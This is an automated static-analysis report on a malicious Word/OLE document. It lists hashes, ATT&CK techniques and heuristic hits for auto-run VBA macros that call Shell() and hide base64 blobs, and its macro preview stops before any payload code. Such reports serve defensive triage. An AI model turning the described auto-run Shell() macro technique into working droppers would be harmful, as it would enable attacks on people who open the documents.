Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 27212e2c415f25ca…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 48.5 KB
Created: 2018-02-22 02:10:00
Authoring application: Microsoft Office Word
First seen: 2019-06-27
MD5: b4d939ed5ea7ac4dec3377946b1a7c17
SHA-1: 23a26797a117b82de5c8d1c8c6502f7130961bb4
SHA-256: 27212e2c415f25cad4451ea6e4eb4eb5fd3918c26c0f83c0ada5a1fa9e51d9d5
Risk Score: 224

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The file contains VBA macros, including a Workbook_Open macro, a common technique for running code automatically when the document is opened. The critical heuristic 'OLE_VBA_SHELL' indicates use of the Shell() function, which strongly suggests execution of arbitrary commands. The extracted VBA macro module 'macros.bas' supports this finding, and the ClamAV detection confirms that the file is malicious.

Heuristics (7)

  • ClamAV: Xls.Malware.Cwsp-6735643-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro
  • Workbook_Open macro [high] (OLE_VBA_WBOPEN)
    Workbook_Open macro
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10176 bytes
SHA-256: d6e6756817222a23f8d0a9528274f2405b52b666fa1003e72e5797bea32346c5
Detection: ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 38 long base64-like blob(s).
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Sub Workbook_Open()
Dim OR_C As String
... (truncated)